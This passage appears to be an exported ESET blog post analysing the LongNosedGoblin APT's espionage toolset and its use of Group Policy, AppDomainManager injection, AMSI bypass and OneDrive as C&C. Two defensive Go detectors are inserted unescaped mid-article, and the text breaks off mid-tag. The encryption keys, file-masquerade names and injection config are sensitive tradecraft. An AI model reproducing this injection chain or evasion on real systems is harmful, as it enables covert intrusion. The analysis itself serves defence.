{"id":9978,"date":"2025-12-21T16:25:14","date_gmt":"2025-12-21T16:25:14","guid":{"rendered":"https:\/\/techtrendfeed.com\/?p=9978"},"modified":"2025-12-21T16:25:14","modified_gmt":"2025-12-21T16:25:14","slug":"longnosedgoblin-tries-to-smell-out-governmental-affairs-in-southeast-asia-and-japan","status":"publish","type":"post","link":"https:\/\/techtrendfeed.com\/?p=9978","title":{"rendered":"LongNosedGoblin tries to smell out governmental affairs in Southeast Asia and Japan"},"content":{"rendered":"<div>\n<p>In 2024, ESET researchers noticed previously undocumented malware in the network of a Southeast Asian governmental entity. This led us to uncover even more new malware on the same system, none of which had substantial ties to any previously tracked threat actors. Based on our findings, we decided to attribute the malicious tools to a new China-aligned APT group that we have named LongNosedGoblin.<\/p>\n<p>The group employs a varied custom toolset consisting mainly of C#\/.NET applications, and, notably, uses Group Policy to deploy its malware and move laterally across the systems of targeted entities. 
This blogpost details our discovery of LongNosedGoblin, goes over its known campaigns, and dives into the toolset of the group.<\/p>\n<blockquote>\n<p><strong>Key points of the report:<\/strong><\/p>\n<ul>\n<li>LongNosedGoblin is a newly discovered China-aligned APT group targeting governmental entities in Southeast Asia and Japan, with the goal of cyberespionage.<\/li>\n<li>The group has been active since at least September 2023.<\/li>\n<li>LongNosedGoblin uses Group Policy to deploy malware across the compromised network, and cloud services (e.g., Microsoft OneDrive and Google Drive) as command and control (C&amp;C) servers.<\/li>\n<li>One of the group\u2019s tools, NosyHistorian, is used to collect browser history and identify where to deploy further malware, such as the NosyDoor backdoor.<\/li>\n<li>NosyDoor is most likely being shared by several China-aligned threat actors.<\/li>\n<li>We provide a detailed analysis of NosyHistorian, NosyDoor, NosyStealer, NosyDownloader, NosyLogger, and other tools used by LongNosedGoblin.<\/li>\n<\/ul>\n<\/blockquote>\n<h2>Smells like trouble: Introducing LongNosedGoblin<\/h2>\n<p>LongNosedGoblin is a China-aligned APT group that targets governmental entities in Southeast Asia and Japan, with the goal of conducting cyberespionage. 
As we already mentioned: in its campaigns, LongNosedGoblin abuses <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/learn.microsoft.com\/en-us\/windows-server\/identity\/ad-ds\/manage\/group-policy\/group-policy-overview\" target=\"_blank\" rel=\"noopener\">Group Policy<\/a> \u2013 a mechanism for managing settings and permissions on Windows machines, typically used with Active Directory \u2013 to deploy malware and move laterally across the compromised network.<\/p>\n<p>One of the main tools in its arsenal is NosyHistorian, a C#\/.NET application that the group uses to collect browser history, which is then used to determine where to deploy further malware. This includes another major LongNosedGoblin tool, a backdoor that we named NosyDoor, which, in campaigns we observed, used Microsoft OneDrive as its C&amp;C server. NosyDoor also employs living-off-the-land techniques in its execution chain, specifically <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/techniques\/T1574\/014\/\" target=\"_blank\" rel=\"noopener\">AppDomainManager injection<\/a>. Finally, several of the group\u2019s tools can bypass the <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/amsi\/antimalware-scan-interface-portal\" target=\"_blank\" rel=\"noopener\">Antimalware Scan Interface<\/a> (AMSI), which enables antimalware products to scan various scripts before execution.<\/p>\n<h3>Discovery<\/h3>\n<p>In February 2024, we found unknown malware on a system of a governmental entity in Southeast Asia. The malware was used to drop a custom backdoor, which we later named NosyDoor. 
At the same time, we noticed that the compromise involved not just one, but several machines from the same entity, with the malware having been deployed via Group Policy.<\/p>\n<p>Additional analysis revealed that the same victims were also affected by a different malicious tool distributed via Group Policy, this one used for collecting browser history. We named the tool NosyHistorian. While we found many victims affected by NosyHistorian in the course of our original investigation between January and March 2024, only a small subset of them were compromised by NosyDoor. Some samples of NosyDoor\u2019s dropper even contained execution guardrails to limit operation to specific victims\u2019 machines.<\/p>\n<p>Later, we identified even more unknown malware on the victims\u2019 machines: NosyStealer, which exfiltrates browser data; NosyDownloader, which downloads and runs a payload in memory; NosyLogger, a keylogger; other tools like a reverse SOCKS5 proxy; and an argument runner (a tool that runs an application passed as an argument) that was used to run a video recorder, likely <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/ffmpeg.org\/\">FFmpeg<\/a>, to capture audio and video. The downloader was first recorded in our telemetry as far back as September 2023.<\/p>\n<h3>Attribution<\/h3>\n<p>Due to the unique toolset, along with the use of Group Policy for lateral movement, we decided to attribute the attacks to a new China-aligned APT group, and named it LongNosedGoblin. 
We noticed some overlap in the file paths mentioned in a <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/securelist.com\/toddycat-traffic-tunneling-data-extraction-tools\/112443\/\" target=\"_blank\" rel=\"noopener\">Kaspersky blogpost about ToddyCat activity<\/a>, an APT group with similar <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/securelist.com\/toddycat\/106799\/\" target=\"_blank\" rel=\"noopener\">targeting<\/a>, but the malware in that report lacks code similarity with the malware considered here.<\/p>\n<p>It should also be noted that in June 2025, the Russian cybersecurity company Solar published a <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/web.archive.org\/web\/20250803114940\/https:\/rt-solar.ru\/solar-4rays\/blog\/5603\/\" target=\"_blank\" rel=\"noopener\">blogpost<\/a> on an APT group it refers to as Erudite Mogwai, which used a payload that closely resembles LongNosedGoblin\u2019s NosyDoor. According to the authors, Erudite Mogwai targeted the IT infrastructure of a Russian government organization and Russian IT companies, using the LuckyStrike Agent backdoor in its operations.<\/p>\n<p>However, we cannot confirm that Erudite Mogwai and LongNosedGoblin are one and the same, as there is a distinct difference in TTPs between the two groups. Notably, the Erudite Mogwai research does not mention the abuse of Active Directory Group Policy for malware deployment \u2013 a technique that is quite specific to LongNosedGoblin\u2019s operations.<\/p>\n<p>We later identified another instance of a NosyDoor variant targeting an organization in an EU country, once again employing different TTPs, and using the Yandex Disk cloud service as a C&amp;C server. The use of this NosyDoor variant suggests that the malware may be shared among several China-aligned threat groups. 
This is further corroborated by Solar\u2019s observation of the word <span style=\"font-family: courier new, courier, monospace;\">Paid<\/span> in the PDB path of NosyDoor, suggesting that the malware may be commercially offered as a service \u2013 possibly indicating it is being sold or licensed to other threat actors.<\/p>\n<h3>Later campaigns<\/h3>\n<p>Throughout 2024, LongNosedGoblin was actively deploying NosyDownloader in Southeast Asia. In December of the same year, we detected an updated version of NosyHistorian in Japan, but then observed no subsequent activity.<\/p>\n<p>In September 2025, we began seeing renewed activity of the group in Southeast Asia. As in earlier campaigns, the threat actor leveraged Group Policy to deliver NosyHistorian to targeted machines.<\/p>\n<p>During this wave of attacks, we noticed behavior consistent with <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/software\/S0154\/\" target=\"_blank\" rel=\"noopener\">Cobalt Strike<\/a> usage: a loader named <span style=\"font-family: courier new, courier, monospace;\">oci.dll<\/span> was downloaded on a single machine, with a payload named <span style=\"font-family: courier new, courier, monospace;\">ocapi.edb<\/span> loaded from disk. LongNosedGoblin then deployed the potential Cobalt Strike loader to selected machines via Group Policy.<\/p>\n<p>Additionally, we observed that another related component, <span style=\"font-family: courier new, courier, monospace;\">mscorsvc.dll<\/span>, was downloaded, with its payload stored in <span style=\"font-family: courier new, courier, monospace;\">conf.ini<\/span>. 
This loader was then deployed to victims\u2019 machines using Group Policy, employing the same delivery mechanism as <span style=\"font-family: courier new, courier, monospace;\">oci.dll<\/span>.<\/p>\n<h2>Nosing around: LongNosedGoblin\u2019s toolset<\/h2>\n<h3>NosyHistorian<\/h3>\n<p>NosyHistorian is a C#\/.NET application with a self-explanatory internal name <span style=\"font-family: courier new, courier, monospace;\">GetBrowserHistory<\/span>, as it, indeed, collects browser history. In the observed campaigns, the attackers used this tool to gain insight about the machines in the compromised infrastructure. Based on this information, they picked a small subset of specific victims to compromise further with their NosyDoor backdoor.<\/p>\n<p>We observed the tool being deployed via Group Policy under the filename <span style=\"font-family: courier new, courier, monospace;\">History.ini<\/span>, disguising the file as an INI file. In reality, this is a portable executable (PE) file, with the goal most likely being to blend in with other INI files <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/learn.microsoft.com\/en-us\/previous-versions\/windows\/it-pro\/windows-server-2012-r2-and-2012\/dn789188(v=ws.11)#ini-files-extension\" target=\"_blank\" rel=\"noopener\">commonly<\/a> stored in the Group Policy cache directory.<\/p>\n<p>NosyHistorian iterates over all users on the machine and retrieves the browser history from Google Chrome, Microsoft Edge, and Mozilla Firefox. Each history database file is copied to a temporary directory and then uploaded to a specific hardcoded SMB share within the local network of the compromised organization. 
NosyHistorian\u2019s filename for each web browser\u2019s history file is listed in Table\u00a01, where <span style=\"font-family: courier new, courier, monospace;\">&lt;profile_name&gt;<\/span> corresponds to web browser profiles.<\/p>\n<p style=\"text-align: center;\"><em>Table\u00a01. History filenames crafted by NosyHistorian<\/em><\/p>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"132\"><strong>Web browser<\/strong><\/td>\n<td width=\"511\"><strong>Filename<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"132\">Google Chrome<\/td>\n<td width=\"511\"><span style=\"font-family: courier new, courier, monospace;\">&lt;username&gt;_&lt;machine_name&gt;_&lt;profile_name&gt;_History<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"132\">Microsoft Edge<\/td>\n<td width=\"511\"><span style=\"font-family: courier new, courier, monospace;\">&lt;username&gt;_&lt;machine_name&gt;_edge_History<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"132\">Mozilla Firefox<\/td>\n<td width=\"511\"><span style=\"font-family: courier new, courier, monospace;\">&lt;username&gt;_&lt;machine_name&gt;_firefox_&lt;profile_name&gt;_places.sqlite<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Both this tool and NosyDoor have similar PDB paths and were compiled from the <span style=\"font-family: courier new, courier, monospace;\">E:\\Csharp<\/span> directory, with the NosyHistorian PDB path being: <span style=\"font-family: courier new, courier, monospace;\">E:\\Csharp\\SharpMisc\\GetBrowserHistory\\obj\\Debug\\GetBrowserHistory.pdb<\/span>.<\/p>\n<h3>NosyDoor<\/h3>\n<p>As stated previously, the NosyDoor backdoor uses cloud services, such as Microsoft OneDrive, for its C&amp;C server. The malware has a fairly simple, three-stage chain of execution, depicted in Figure\u00a01. 
The first stage is a dropper that deploys the second stage, which involves a living-off-the-land attack using the <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/techniques\/T1574\/014\/\">AppDomainManager injection technique<\/a>, which is in turn used to execute the final payload, the backdoor itself.<\/p>\n<p>NosyDoor collects metadata about the victim\u2019s machine, including the machine name, username, the OS version, and the name of the current process, and sends it all to the C&amp;C. It then retrieves and parses task files with commands from the C&amp;C. The commands allow it to exfiltrate files, delete files, and execute shell commands, among other things.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 1. NosyDoor execution chain\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/12-25\/longnosedgoblin\/figure-1-1.png\" alt=\"Figure 1. NosyDoor execution chain\" width=\"\" height=\"\"\/><figcaption><em>Figure 1. NosyDoor execution chain<\/em><\/figcaption><\/figure>\n<h4>NosyDoor Stage 1 \u2013 dropper<\/h4>\n<p>The malware\u2019s first stage is a dropper, specifically a C#\/.NET application with the internal name <span style=\"font-family: courier new, courier, monospace;\">OneClickOperation<\/span>. Same as NosyHistorian, it is deployed via Group Policy. 
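Both NosyHistorian, deployed above as History.ini, and this dropper, which the next paragraph describes hiding behind Registry.pol, are PE files sitting under data-file names in a Group Policy cache. The following Go program is an added example, not ESET's tooling and not code from the malware, that classifies such a file by its content instead of its extension: a genuine Registry.pol begins with the PReg signature and version 1, an INI file is plain text, and an MZ/PE header under either name is the masquerade. The file names in main are hypothetical and the byte strings are constructed inline.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"fmt"
	"path/filepath"
	"strings"
)

// Content kinds returned by Classify.
const (
	KindPE          = "PE"           // MZ/PE image, whatever the extension says
	KindRegistryPol = "Registry.pol" // genuine Group Policy registry file: "PReg" + version 1
	KindText        = "text"         // plain text such as an INI file
	KindUnknown     = "unknown"
)

// isPE checks the DOS "MZ" header and follows e_lfanew (offset 0x3C) to the "PE\0\0" signature.
func isPE(b []byte) bool {
	if len(b) < 0x40 || !bytes.HasPrefix(b, []byte("MZ")) {
		return false
	}
	off := uint64(binary.LittleEndian.Uint32(b[0x3C:0x40]))
	return off+4 <= uint64(len(b)) && bytes.Equal(b[off:off+4], []byte("PE\x00\x00"))
}

// isRegistryPol checks the documented Registry.pol header: ASCII "PReg" then DWORD version 1.
func isRegistryPol(b []byte) bool {
	return len(b) >= 8 && bytes.Equal(b[:4], []byte("PReg")) && binary.LittleEndian.Uint32(b[4:8]) == 1
}

// isText accepts UTF-16LE with a BOM or printable 8-bit text; other control bytes mean "not an INI".
func isText(b []byte) bool {
	if bytes.HasPrefix(b, []byte{0xFF, 0xFE}) {
		return true
	}
	for _, c := range b {
		if c < 0x20 && c != '\t' && c != '\n' && c != '\r' {
			return false
		}
	}
	return len(b) > 0
}

// Classify decides by content only; the file name is never consulted here.
func Classify(b []byte) string {
	switch {
	case isPE(b):
		return KindPE
	case isRegistryPol(b):
		return KindRegistryPol
	case isText(b):
		return KindText
	}
	return KindUnknown
}

// Suspicious reports a PE hiding behind an .ini, .pol or .plo name, the masquerade described in the post.
func Suspicious(name string, b []byte) bool {
	switch strings.ToLower(filepath.Ext(name)) {
	case ".ini", ".pol", ".plo":
		return Classify(b) == KindPE
	}
	return false
}

// samplePE is a constructed minimal PE header (not a real binary): MZ, e_lfanew=0x40, then "PE\0\0".
func samplePE() []byte {
	b := make([]byte, 0x44)
	copy(b, "MZ")
	binary.LittleEndian.PutUint32(b[0x3C:], 0x40)
	copy(b[0x40:], "PE\x00\x00")
	return b
}

// samplePol is a constructed, empty but well-formed Registry.pol header.
func samplePol() []byte { return []byte("PReg\x01\x00\x00\x00") }

func main() {
	files := map[string][]byte{ // hypothetical names from a Group Policy cache directory
		"History.ini":  samplePE(),
		"Registry.pol": samplePol(),
		"Registry.plo": samplePE(),
		"fdeploy.ini":  []byte("[FolderStatus]\r\nDesktop=0\r\n"),
	}
	for name, data := range files {
		fmt.Printf("%-13s %-13s suspicious=%v\n", name, Classify(data), Suspicious(name, data))
	}
}
```

A UTF-16 INI without a BOM, or a Registry.pol written with a different version word, lands in the unknown bucket; treat that bucket as worth a manual look rather than as clean.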
We have seen the dropper masquerade as a <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/learn.microsoft.com\/en-us\/previous-versions\/windows\/desktop\/policy\/registry-policy-file-format\" target=\"_blank\" rel=\"noopener\">Registry Policy file<\/a> by using the filename <span style=\"font-family: courier new, courier, monospace;\">Registry.pol<\/span>, although we also observed <span style=\"font-family: courier new, courier, monospace;\">Registry.plo<\/span>, which is unusual (it could be a typo, or maybe the threat actors didn\u2019t want the filename to conflict with another malicious file).<\/p>\n<p>The dropper base64 decodes embedded files and decrypts them via Data Encryption Standard (DES) with both key and initialization vector set to <span style=\"font-family: courier new, courier, monospace;\">UevAppMo<\/span> (the first eight bytes of the string <span style=\"font-family: courier new, courier, monospace;\">UevAppMonitor<\/span>), then drops them to <span style=\"font-family: courier new, courier, monospace;\">C:\\Windows\\Microsoft.NET\\Framework<\/span> with the following filenames:<\/p>\n<ul>\n<li><span style=\"font-family: courier new, courier, monospace;\">SharedReg.dll<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">log.cached<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">netfxsbs9.hkf<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">UevAppMonitor.exe.config<\/span><\/li>\n<\/ul>\n<p>These filenames were chosen deliberately to blend in with existing files, as the directory usually contains files named <span style=\"font-family: courier new, courier, monospace;\">SharedReg12.dll<\/span> and <span style=\"font-family: courier new, courier, monospace;\">netfxsbs12.hkf<\/span>.<\/p>\n<p>In its final steps, the dropper creates and starts a Windows scheduled task with the name <span style=\"font-family: courier new, courier, monospace;\">OneDrive Reporting Task-S-1-5-21-&lt;guid&gt;<\/span> under the Microsoft task folder, where <span style=\"font-family: courier new, courier, monospace;\">&lt;guid&gt;<\/span> is a random GUID string. The name mimics the legitimate OneDrive reporting task, whose suffix is the user\u2019s full SID rather than a GUID, so the shape of the suffix is a useful hunting pivot. The scheduled task is responsible for executing the legitimate <span style=\"font-family: courier new, courier, monospace;\">UevAppMonitor.exe<\/span> in the <span style=\"font-family: courier new, courier, monospace;\">C:\\Windows\\Microsoft.NET\\Framework<\/span> directory during system startup. The dropper copies the legitimate file from <span style=\"font-family: courier new, courier, monospace;\">C:\\Windows\\System32<\/span> to the new location.<\/p>\n<p>The newer samples also include an execution guardrail that makes the dropper operate only on victims\u2019 computers with a specific machine name (see Figure\u00a02).<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 2. Dropper code with execution guardrails\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/12-25\/longnosedgoblin\/figure-2.png\" alt=\"Figure 2. Dropper code\" width=\"\" height=\"\"\/><figcaption><em>Figure 2. Dropper code with execution guardrails<\/em><\/figcaption><\/figure>\n<h4>NosyDoor Stage 2 \u2013 AppDomainManager injection<a rel=\"nofollow\" target=\"_blank\" id=\"NosyDoor Stage 2 \u2013 AppDomainManager injection\"\/><\/h4>\n<p><span style=\"font-family: courier new, courier, monospace;\">UevAppMonitor.exe<\/span> is a legitimate C#\/.NET application, which the malware copied from the <span style=\"font-family: courier new, courier, monospace;\">C:\\Windows\\System32<\/span> to the <span style=\"font-family: courier new, courier, monospace;\">C:\\Windows\\Microsoft.NET\\Framework<\/span> directory and used as a living-off-the-land binary, or <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/lolbas-project.github.io\/\" target=\"_blank\" rel=\"noopener\">LOLBin<\/a>. 
Living-off-the-land attacks abuse legitimate tools already present on the system. In this case, the application is used to trigger <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/web.archive.org\/web\/20250330053546\/https:\/www.rapid7.com\/blog\/post\/2023\/05\/05\/appdomain-manager-injection-new-techniques-for-red-teams\/\" target=\"_blank\" rel=\"noopener\">AppDomainManager injection<\/a> via a configuration file. This technique can make applications built on the .NET Framework load malicious code instead of the intended legitimate code by making use of the AppDomainManager class.<\/p>\n<p>When the application is executed, it loads the configuration file shown in Figure\u00a03, which makes the application call the <span style=\"font-family: courier new, courier, monospace;\">InitializeNewDomain<\/span> method of the custom <span style=\"font-family: courier new, courier, monospace;\">SharedReg<\/span> class in <span style=\"font-family: courier new, courier, monospace;\">SharedReg.dll<\/span>. The configuration also sets the <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/learn.microsoft.com\/en-us\/dotnet\/framework\/configure-apps\/file-schema\/runtime\/etwenable-element\" target=\"_blank\" rel=\"noopener\">&lt;etwEnable&gt; element\u2019s<\/a> <span style=\"font-family: courier new, courier, monospace;\">enabled<\/span> attribute to <span style=\"font-family: courier new, courier, monospace;\">false<\/span> so that Event Tracing for Windows is disabled.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 3. Content of UevAppMonitor.exe.config with specified AppDomainManager\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/12-25\/longnosedgoblin\/figure-3.png\" alt=\"Figure 3. Content of UevAppMonitor.exe.config with specified AppDomainManager\" width=\"\" height=\"\"\/><figcaption><em>Figure 3. Content of <\/em><span style=\"font-family: courier new, courier, monospace;\">UevAppMonitor.exe<\/span><em>.config with specified AppDomainManager<\/em><\/figcaption><\/figure>\n<p><span style=\"font-family: courier new, courier, monospace;\">SharedReg.dll<\/span> contains code to bypass <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/amsi\/antimalware-scan-interface-portal\" target=\"_blank\" rel=\"noopener\">AMSI<\/a>, from an open-source AV\/EDR evasion framework called <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/github.com\/klezVirus\/inceptor\" target=\"_blank\" rel=\"noopener\">inceptor<\/a>. Apart from that, it base64 decodes the file <span style=\"font-family: courier new, courier, monospace;\">netfxsbs9.hkf<\/span>, decrypts the result via AES with key <span style=\"font-family: courier new, courier, monospace;\">UevAppMonitor<\/span>, padded with null bytes until its length is 16, initialization vector <span style=\"font-family: courier new, courier, monospace;\">0<\/span>, and finally base64 decodes the result again. The result is NosyDoor, which is then executed. Any errors are written to the file <span style=\"font-family: courier new, courier, monospace;\">error.txt<\/span> in the <span style=\"font-family: courier new, courier, monospace;\">C:\\Windows\\Microsoft.NET\\Framework<\/span> directory.<\/p>\n<h4>NosyDoor Stage 3 \u2013 payload<\/h4>\n<p>NosyDoor\u2019s third stage, the main payload, is a C#\/.NET backdoor with the internal name OneDrive and with PDB path <span style=\"font-family: courier new, courier, monospace;\">E:\\Csharp\\ThomasServer\\Thomas\\OneDrive\\obj\\Release\\OneDrive.pdb<\/span>. 
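The configuration-file half of the Stage 2 AppDomainManager injection described above is easy to sweep for offline. The Go program below is an added example, not ESET's tooling and not the verbatim file from Figure 3: it parses an .exe.config and reports the two runtime settings the text names, an appDomainManagerAssembly/appDomainManagerType override and an etwEnable element with enabled set to false. SampleInjectedConfig is constructed to match the description (a SharedReg type in SharedReg.dll, ETW off); the exact assembly attribute string is an assumption.

```go
package main

import (
	"encoding/xml"
	"fmt"
	"strings"
)

// Only the <runtime> children relevant to AppDomainManager injection are modelled;
// encoding/xml ignores everything else in the file.
type valueElem struct {
	Value string `xml:"value,attr"`
}

type etwElem struct {
	Enabled string `xml:"enabled,attr"`
}

type runtimeElem struct {
	ManagerAssembly *valueElem `xml:"appDomainManagerAssembly"`
	ManagerType     *valueElem `xml:"appDomainManagerType"`
	Etw             *etwElem   `xml:"etwEnable"`
}

type appConfig struct {
	XMLName xml.Name    `xml:"configuration"`
	Runtime runtimeElem `xml:"runtime"`
}

// Inspect parses an <app>.exe.config and returns one finding per runtime setting
// that the post associates with the injection chain.
func Inspect(cfg []byte) ([]string, error) {
	var c appConfig
	if err := xml.Unmarshal(cfg, &c); err != nil {
		return nil, err
	}
	var findings []string
	r := c.Runtime
	if r.ManagerAssembly != nil || r.ManagerType != nil {
		asm, typ := "", ""
		if r.ManagerAssembly != nil {
			asm = r.ManagerAssembly.Value
		}
		if r.ManagerType != nil {
			typ = r.ManagerType.Value
		}
		findings = append(findings, fmt.Sprintf("AppDomainManager override: assembly=%q type=%q", asm, typ))
	}
	if r.Etw != nil && strings.EqualFold(strings.TrimSpace(r.Etw.Enabled), "false") {
		findings = append(findings, "Event Tracing for Windows disabled via <etwEnable enabled=\"false\">")
	}
	return findings, nil
}

// IsInjected is the yes/no form for a directory sweep; unparseable files are not reported.
func IsInjected(cfg []byte) bool {
	f, err := Inspect(cfg)
	return err == nil && len(f) > 0
}

// SampleInjectedConfig is constructed to match the post's description of UevAppMonitor.exe.config
// (custom SharedReg type in SharedReg.dll, ETW off); the assembly attribute string is an assumption.
const SampleInjectedConfig = `<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <runtime>
    <appDomainManagerAssembly value="SharedReg, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
    <appDomainManagerType value="SharedReg" />
    <etwEnable enabled="false" />
  </runtime>
</configuration>`

// SampleBenignConfig is an ordinary .NET Framework config with no runtime overrides.
const SampleBenignConfig = `<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <startup>
    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.8" />
  </startup>
</configuration>`

func main() {
	samples := map[string]string{"UevAppMonitor.exe.config": SampleInjectedConfig, "benign.exe.config": SampleBenignConfig}
	for name, cfg := range samples {
		findings, err := Inspect([]byte(cfg))
		fmt.Printf("%s: err=%v findings=%v\n", name, err, findings)
	}
}
```

Legitimate software occasionally ships its own AppDomainManager, so a hit is a triage lead rather than a verdict: the combination that matters is an override next to a system binary that has been copied out of System32, as UevAppMonitor.exe was here.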
As this name suggests, the backdoor uses cloud services, in this case Microsoft OneDrive, as a C&amp;C server.<\/p>\n<p>The full list of metadata the backdoor collects consists of the following:<\/p>\n<ul>\n<li>external IPv4 address,<\/li>\n<li>local IPv4 address,<\/li>\n<li>agent ID,<\/li>\n<li>username,<\/li>\n<li>machine name,<\/li>\n<li>current directory,<\/li>\n<li>current process (name, ID, architecture),<\/li>\n<li>stage 3 local start time,<\/li>\n<li>current local time,<\/li>\n<li>OS version,<\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">CodeType<\/span> (see Table 3), and<\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">AgentType<\/span> (see Table 3).<\/li>\n<\/ul>\n<p>All collected metadata is encrypted via RSA and then uploaded to OneDrive as the file <span style=\"font-family: courier new, courier, monospace;\">Read_&lt;agent_id&gt;.max<\/span>. Once NosyDoor sends the metadata, it looks for commands from the C&amp;C in task files with <span style=\"font-family: courier new, courier, monospace;\">.max<\/span> extensions in the following directory:<\/p>\n<p><span style=\"font-family: courier new, courier, monospace;\">&lt;FolderName&gt;-&lt;ListenerID&gt;\/&lt;agent_id&gt;\/&lt;Payload.TaskFolderName&gt;<\/span><\/p>\n<p>Each task file contains an encrypted command, which is encapsulated with values taken from the backdoor\u2019s configuration:<\/p>\n<p>The command is then decoded with base64 and decrypted via AES with key <span style=\"font-family: courier new, courier, monospace;\">&lt;Payload.Key&gt;<\/span> and initialization vector <span style=\"font-family: courier new, courier, monospace;\">0<\/span>. All commands are described in Table\u00a02. 
Although the command <span style=\"font-family: courier new, courier, monospace;\">CMD_TYPE_TASKSCHEDULER<\/span> is mentioned in the code, it is not implemented in any of the observed samples.<\/p>\n<p style=\"text-align: center;\"><em>Table\u00a02. Commands supported by NosyDoor<\/em><\/p>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"198\"><strong>Command<\/strong><\/td>\n<td width=\"444\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"198\"><span style=\"font-family: courier new, courier, monospace;\">CMD_TYPE_SHELL<\/span><\/td>\n<td width=\"444\">Execute a shell command.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span style=\"font-family: courier new, courier, monospace;\">CMD_TYPE_EXEC_ASM<\/span><\/td>\n<td width=\"444\">Load a .NET assembly.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span style=\"font-family: courier new, courier, monospace;\">CMD_TYPE_EXIT<\/span><\/td>\n<td width=\"444\">Quit NosyDoor.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span style=\"font-family: courier new, courier, monospace;\">CMD_TYPE_REMOVE<\/span><\/td>\n<td width=\"444\">Delete a file and list its original directory.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span style=\"font-family: courier new, courier, monospace;\">CMD_TYPE_DOWNLOAD<\/span><\/td>\n<td width=\"444\">Exfiltrate a file. Note that download and upload commands are named here from the attacker\u2019s perspective, treating the C&amp;C machine as the local machine and the victim machine as the remote one.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span style=\"font-family: courier new, courier, monospace;\">CMD_TYPE_UPLOAD<\/span><\/td>\n<td width=\"444\">Upload a file to the victim\u2019s machine, delete it from OneDrive, and list the directory where the file was uploaded.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span style=\"font-family: courier new, courier, monospace;\">CMD_TYPE_DRIVES<\/span><\/td>\n<td width=\"444\">Get names and sizes of logical drives present on the machine.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span style=\"font-family: courier new, courier, monospace;\">CMD_TYPE_FILE_BROWSE<\/span><\/td>\n<td width=\"444\">Obtain a directory listing, including file icons.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span style=\"font-family: courier new, courier, monospace;\">CMD_TYPE_SLEEP<\/span><\/td>\n<td width=\"444\">Set the beaconing interval.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span style=\"font-family: courier new, courier, monospace;\">CMD_TYPE_TASKSCHEDULER<\/span><\/td>\n<td width=\"444\">Not implemented.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span style=\"font-family: courier new, courier, monospace;\">CMD_TYPE_Plugin<\/span><\/td>\n<td width=\"444\">Load a .NET assembly, directly calling the method <span style=\"font-family: courier new, courier, monospace;\">Plugin.Run<\/span>.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>After executing the command, NosyDoor performs the reverse steps \u2013 encrypts command output using AES, encodes with base64, and encapsulates with the strings <span style=\"font-family: courier new, courier, monospace;\">&lt;Payload.Prepend&gt;&lt;Payload.PayloadPrepend&gt;<\/span> and <span style=\"font-family: courier new, courier, monospace;\">&lt;Payload.PayloadAppend&gt;&lt;Payload.Append&gt;<\/span>. Each result is stored on the C&amp;C server in a file with a filename specifying local time (Unix timestamp multiplied by 100,000) and ending with the <span style=\"font-family: courier new, courier, monospace;\">.max<\/span> extension:<\/p>\n<p><span style=\"font-family: courier new, courier, monospace;\">&lt;FolderName&gt;-&lt;ListenerID&gt;\/&lt;agent_id&gt;\/&lt;Payload.ReceiveFolderName&gt;\/&lt;unix_timestamp&gt;.max<\/span><\/p>\n<p>If an exception occurs during NosyDoor\u2019s operation, the backdoor writes the exception message together with the local time to <span style=\"font-family: courier new, courier, monospace;\">C:\\Users\\Public\\Libraries\\thomas.log<\/span>.<\/p>\n<p>The backdoor contains a custom dependency named <span style=\"font-family: courier new, courier, monospace;\">Library<\/span> that is embedded as a resource by using <a rel=\"nofollow\" target=\"_blank\" 